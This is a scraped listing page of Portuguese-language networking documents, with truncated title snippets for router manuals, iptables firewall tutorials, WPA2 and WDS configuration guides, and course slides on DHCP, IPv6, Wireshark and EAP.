AP Router WR b+g Wireless Router. Manual Do Usuário AP Router WR 252 802.11b+g Wireless Router 802.11g/802.11b Wireless Access Point Broadband Internet Access 2-Port Switching Hub Manual Do Usuário Índice CAPÍTULO 1: INTRODUÇÃO... 3 WR 252 Características...

Leia mais

Projeto de Ensino. iptables. Grupo de Estudos em Tecnologia de Redes e Processamento Paralelo. Prof. Luiz Antonio Unioeste

Projeto de Ensino. iptables. Grupo de Estudos em Tecnologia de Redes e Processamento Paralelo. Prof. Luiz Antonio Unioeste Projeto de Ensino Grupo de Estudos em Tecnologia de Redes e Processamento Paralelo iptables Prof. Luiz Antonio Unioeste Introdução Firewall O Firewall é um programa que tem como objetivo proteger a máquina

Leia mais

Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2)

Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2) Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2) Índice Introdução Pré-requisitos Requisitos Componentes Usados Convenções Informações complementares Suporte a WPA 2 com Equipamentos Cisco Aironet

Leia mais

Procedimentos para configuração de WDS With AP

Procedimentos para configuração de WDS With AP Procedimentos para configuração de WDS With AP No modo WDS with AP, o DWL-2100AP se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System) permite

Leia mais

Compartilhamento da internet, firewall

Compartilhamento da internet, firewall da internet, firewall João Medeiros (joao.fatern@gmail.com) 1 / 29 Exemplo de transmissão 2 / 29 Exemplo de transmissão Dados trafegam em pacotes com até 1460 bytes de dados e dois headers de 20 bytes

Leia mais

W-R2000nL v1.3 Guia de instalação

W-R2000nL v1.3 Guia de instalação W-R2000nL v1.3 Guia de instalação Sumário Instalação...3 Configurando seu computador...4 Acessando a tela de configurações...5 Configuração de Roteamento...6 Alterando senha da rede sem fio...11 Repetição

Leia mais

INSTALAÇÃO PRINTERTUX. Tutorial

INSTALAÇÃO PRINTERTUX. Tutorial INSTALAÇÃO PRINTERTUX Tutorial 2 1. Download 1 Efetue o download acessando o endereço: https://www.hesolucoes.com.br/iso/printertux-2.1.iso MD5SUM: 844d318e9672fdbffec0ad354b642d5b 2. Pré-Requisitos (Hardware)

Leia mais

RCO2. WLAN: Segurança e IEEE

RCO2. WLAN: Segurança e IEEE RCO2 WLAN: Segurança e IEEE 802. Segurança: muitos problemas... Uso indevido da infraestrutura Equipamentos/usuários não autorizados Quebra de privacidade Tráfego monitorado Conteúdo trafegado revelado!

Leia mais

Roitier Campos Gonçalves Goiânia, 18 de Novembro de Criando um Servidor Proxy/Firewall com Squid + IPTables!

Roitier Campos Gonçalves Goiânia, 18 de Novembro de Criando um Servidor Proxy/Firewall com Squid + IPTables! Roitier Campos Gonçalves Goiânia, 18 de Novembro de 2017 Criando um Servidor Proxy/Firewall com Squid + IPTables! Roteiro Introdução a Redes de Computadores e Internet - Arquitetura Cliente/Servidor e

Leia mais

Daniel Moreno. Novatec

Daniel Moreno. Novatec Daniel Moreno Novatec Novatec Editora Ltda. 2016. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a reprodução desta obra, mesmo parcial, por qualquer processo, sem prévia

Leia mais

Cisco recomenda que você tem o conhecimento do CUCM e dos pontos de acesso da Cisco.

Cisco recomenda que você tem o conhecimento do CUCM e dos pontos de acesso da Cisco. Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Configurar Configuração do ponto de acesso Como alcançar o Access Point (AP) Permita interfaces de rádio Adicionar o VLAN novo A criação

Leia mais

Etapas para configurar o Cisco Aironet 1142 e o telefone do Wi-fi do registro 7925 com CUCM

Etapas para configurar o Cisco Aironet 1142 e o telefone do Wi-fi do registro 7925 com CUCM Etapas para configurar o Cisco Aironet 1142 e o telefone do Wi-fi do registro 7925 com CUCM Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Configurar Configuração do ponto de acesso

Leia mais

Tópicos Especiais em Informática

Tópicos Especiais em Informática Tópicos Especiais em Informática DCHP Prof. Ms.-Eng. Igor Sousa Faculdade Lourenço Filho 5 de novembro de 2014 igorvolt@gmail.com (FLF) Tópicos Especiais em Informática 5 de novembro de 2014 1 / 14 Introdução

Leia mais

Guia Rápido Roteador RE041. quickguide_rv1.indd 1 21/09/ :42:40

Guia Rápido Roteador RE041. quickguide_rv1.indd 1 21/09/ :42:40 Guia Rápido Roteador RE041 quickguide_rv1.indd 1 21/09/2012 14:42:40 quickguide_rv1.indd 2 21/09/2012 14:42:40 3 Sumário Sumário...3 1. Conectando o roteador...4 2. Login no roteador...6 3. Conectando

Leia mais

LAB012 Configuração de uma rede privada virtual (VPN) com a aplicação IPsec 1

LAB012 Configuração de uma rede privada virtual (VPN) com a aplicação IPsec 1 LAB012 Configuração de uma rede privada virtual (VPN) com a aplicação IPsec 1 Neste laboratório vamos implementar uma ligação segura (túnel encriptado) entre dois escritórios da mesma empresa: a filial

Leia mais

Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução

Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução Nagios e NRPE Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução Neste tutorial, cobriremos a instalação do Nagios 4, um sistema de monitoramento de código livre muito popular,

Leia mais

Universidade do Contestado Campus Concórdia. Curso de Sistemas de Informação Prof.: Maico Petry. Ciclo de Palestras e Minicursos

Universidade do Contestado Campus Concórdia. Curso de Sistemas de Informação Prof.: Maico Petry. Ciclo de Palestras e Minicursos Universidade do Contestado Campus Concórdia Curso de Sistemas de Informação Prof.: Maico Petry REDES SEM FIO Ciclo de Palestras e Minicursos Sem fio, Wireless, Wi-Fi As redes sem fio (wireless) eliminam

Leia mais

GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6

GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6 GWR -130 Repetidor Wireless 300Mpbs GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6 Repetidor Wireless 300 Mbps GWR -130 Guia de Instalação Rápida REV.1.0 1. INTRODUÇÃO O Repetidor Wireless 300Mbps (2T2R), modelo

Leia mais

Prática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr.

Prática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr. Prática NAT/Proxy Edgard Jamhour Exercícios práticos sobre NAT e Proxy, usando Linux. Esses exercícios devem ser executados através do servidor de máquinas virtuais:.ppgia.pucpr.br OBS. Esse roteiro utiliza

Leia mais

LABORATÓRIO IPV6.1. INTRODUÇÃO AO IPV6 Documento versão 0.1. Aluno: Paulo Henrique Moreira Gurgel #

LABORATÓRIO IPV6.1. INTRODUÇÃO AO IPV6 Documento versão 0.1. Aluno: Paulo Henrique Moreira Gurgel # LABORATÓRIO IPV6.1 INTRODUÇÃO AO IPV6 Documento versão 0.1 Aluno: Paulo Henrique Moreira Gurgel #5634135 Orientado pela Professora Kalinka Regina Lucas Jaquie Castelo Branco Maio / 2011 Laboratório 6.1

Leia mais

APRESENTAÇÃO CARACTERÍSTICA

APRESENTAÇÃO CARACTERÍSTICA APRESENTAÇÃO Estamos em um mundo de constante evolução tecnológica e com tantas novidades de aparelhos, sistemas, instalações, às vezes fica difícil acompanhar e saber lidar com todos eles. Foi pensando

Leia mais

Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão 802.11

Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão 802.11 Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão 802.11 Airon Fonteles da Silva Bruno Astuto A. Nunes Luciano R. de Albuquerque Sumário Aspectos

Leia mais

SAP Business One 8.8. How to Connect Mobile App to B1 Demo System

SAP Business One 8.8. How to Connect Mobile App to B1 Demo System SAP Business One 8.8 How to Connect Mobile App to B1 Demo System Alexandre Castro Channel Enablement & Solution Expert SAP Business One Ecosystem & Channel Readiness SAP Brasil Março 2011 SAP Business

Leia mais

Configuração de Rede Wireless com Segurança no Evo-W108AR

Configuração de Rede Wireless com Segurança no Evo-W108AR Configuração de Rede Wireless com Segurança no Evo-W108AR Este manual vai orientá-lo a configurar a rede wireless (sem fio) no Evo-W108AR e a configurar a segurança da rede. 1 Abra o navegador (Internet

Leia mais

Guia para Acesso Remoto

Guia para Acesso Remoto Termostato Web Controlador de Temperatura com Acesso Remoto Modelos CTR-101 e CTR-102 Guia para Acesso Remoto Versão 1.0 Julho/2016 1 1- Descrição O Termostato Web é um controlador digital de temperatura

Leia mais

Instalação e Configuração Iptables ( Firewall)

Instalação e Configuração Iptables ( Firewall) Instalação e Configuração Iptables ( Firewall) Pág - 1 Instalação e Configuração Iptables - Firewall Desde o primeiro tutorial da sequencia dos passo a passo, aprendemos a configurar duas placas de rede,

Leia mais

Minicurso. Análise de Redes usando Wireshark

Minicurso. Análise de Redes usando Wireshark Minicurso Análise de Redes usando Wireshark Apresentação Tadeu Ferreira Oliveira Professor do IFRN SGA Graduado em Computação Msc. Em Sistemas de computação na área de redes em chip (Noc) Ex-coordenador

Leia mais

Firewalls - IPTables. Carlos Gustavo A. da Rocha. ASSR

Firewalls - IPTables. Carlos Gustavo A. da Rocha. ASSR Firewalls - IPTables Carlos Gustavo A. da Rocha Histórico de Firewalls no SO Linux O kernel do Linux disponibiliza funcionalidades de filtragem de pacotes desde meados de 1995 Kernel versão 1.2.x e 2.0.x

Leia mais

Serviços de Redes. Aula 03 - Servidor DHCP

Serviços de Redes. Aula 03 - Servidor DHCP Serviços de Redes Aula 03 - Servidor DHCP Instituto Federal Catarinense Campus Sombrio Curso: Tecnologia em Redes de Computadores Professor: Jéferson Mendonça de Limas Por que Utilizar um Servidor DHCP

Leia mais

Manual de Configuração.

Manual de Configuração. O NX WiFi é um conversor de Serial e Ethernet para WiFi, com isso eliminando o cabeamento em suas instalações e deixando-os equipamentos com mais mobilidade. NX WiFi Modo STA Modo STA Neste modo o NXWiFi

Leia mais

Utilizando IP na iluminação Cênica

Utilizando IP na iluminação Cênica Utilizando IP na iluminação Cênica (Conectando software DOT2 on PC e interface LUMIKIT) Por Marco Gonçalves IP (Internet Protocol) O que é IP (Internet Protocol) ou o Protocolo da Internet, a máscara de

Leia mais

Configuração do Evo-W54ARv2 em modo Repetidor WDS

Configuração do Evo-W54ARv2 em modo Repetidor WDS Configuração do Evo-W54ARv2 em modo Repetidor WDS Para realizar a função de repetidor de nosso ponto de acesso necessitaremos de 2 ou mais equipamentos Wireless que suportem a função de WDS Repeater, sabendo

Leia mais

O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB.

O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB. O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB. 1 1- Para realizar o procedimento de configuração o DP-300U deve ser conectado via cabo

Leia mais

Tecnologias e Componentes de Redes

Tecnologias e Componentes de Redes Tecnologias e Componentes de Redes Material de apoio Redes sem fio Cap.13 19/01/2012 2 Esclarecimentos Esse material é de apoio para as aulas da disciplina e não substitui a leitura da bibliografia básica.

Leia mais

Monday, November 16, 2009 EAP. Extensible Authentication Protocol

Monday, November 16, 2009 EAP. Extensible Authentication Protocol EAP Extensible Authentication Protocol EAP Extensible Authentication Protocol Redes de Computadores II Professores: Luis Henrique Kosmalski Costa Otto Carlos Bandeira Duarte Vinícius Ferrão Novembro /

Leia mais